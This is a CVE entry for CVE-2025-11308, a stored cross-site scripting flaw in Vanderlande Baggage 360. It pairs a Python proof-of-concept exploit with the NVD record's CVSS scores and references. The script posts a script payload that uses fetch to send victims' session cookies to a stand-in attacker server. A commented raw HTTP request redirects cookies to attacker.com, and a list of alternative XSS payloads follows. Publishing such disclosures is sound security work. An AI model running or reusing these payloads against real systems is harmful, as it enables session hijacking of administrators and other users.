CVE-2025-11308

# CVE-2025-11308 - Vanderlande Baggage 360 Stored XSS PoC # Vulnerability: Stored Cross-Site Scripting via /api-addons/v1/messages # Parameter: Message (unfiltered) # Author: YasserREED import requests # Target configuration TARGET_URL = "https://target-vanderlande-baggage360.com" API_ENDPOINT = "/api-addons/v1/messages" FULL_URL = TARGET_URL + API_ENDPOINT # Attacker session credentials (low privilege account required) SESSION_COOKIES = { "session": "authenticated_session_token_here" } # Malicious XSS payload - Stored in Message parameter XSS_PAYLOAD = { "Message": "<script>fetch('https://attacker-server.com/steal?cookie=' + document.cookie);</script>", "subject": "Normal Subject", "recipient": "admin" } def exploit_stored_xss(): """ Send a malicious message containing XSS payload to the vulnerable endpoint. The payload will be stored on the server and executed when other users view the message. """ headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } try: # Step 1: Authenticate (if needed) # session = requests.Session() # session.post(TARGET_URL + "/login", data=credentials) # Step 2: Submit malicious payload via Message parameter response = requests.post( FULL_URL, json=XSS_PAYLOAD, cookies=SESSION_COOKIES, headers=headers, verify=False ) if response.status_code == 200 or response.status_code == 201: print("[+] XSS payload successfully stored on the server!") print("[+] Waiting for victim (e.g., admin) to view the message...") else: print(f"[-] Failed to store payload. Status code: {response.status_code}") print(f"[-] Response: {response.text}") except Exception as e: print(f"[-] Error occurred: {str(e)}") if __name__ == "__main__": exploit_stored_xss() # HTTP Proof of Concept (raw request): # # POST /api-addons/v1/messages HTTP/1.1 # Host: target-vanderlande-baggage360.com # Content-Type: application/json # Cookie: session=<valid_session_cookie> # # { # "Message": "<script>alert('XSS');document.location='https://attacker.com/?c='+document.cookie</script>", # "subject": "Test", # "recipient": "admin" # } # Alternative payloads: # - <img src=x onerror=alert(document.cookie)> # - <svg/onload=alert(document.cookie)> # - "><script>alert(document.cookie)</script>

{"cve": {"id": "CVE-2025-11308", "sourceIdentifier": "[email protected]", "published": "2025-10-05T23:15:31.403", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Vanderlande Baggage 360 7.0.0. This issue affects some unknown processing of the file /api-addons/v1/messages. Such manipulation of the argument Message leads to cross site scripting. The attack may be performed from remote. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/YasserREED/YasserREED-CVEs/blob/main/Vanderlande-OpenAIR-Baggage360/Stored%20Cross-Site%20Scripting%20(XSS).md", "source": "[email protected]"}, {"url": "https://github.com/YasserREED/YasserREED-CVEs/blob/main/Vanderlande-OpenAIR-Baggage360/Stored%20Cross-Site%20Scripting%20(XSS).md#http-proof-of-concept-poc", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.327189", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.327189", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.662216", "source": "[email protected]"}, {"url": "https://github.com/YasserREED/YasserREED-CVEs/blob/main/Vanderlande-OpenAIR-Baggage360/Stored%20Cross-Site%20Scripting%20(XSS).md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://github.com/YasserREED/YasserREED-CVEs/blob/main/Vanderlande-OpenAIR-Baggage360/Stored%20Cross-Site%20Scripting%20(XSS).md#http-proof-of-concept-poc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}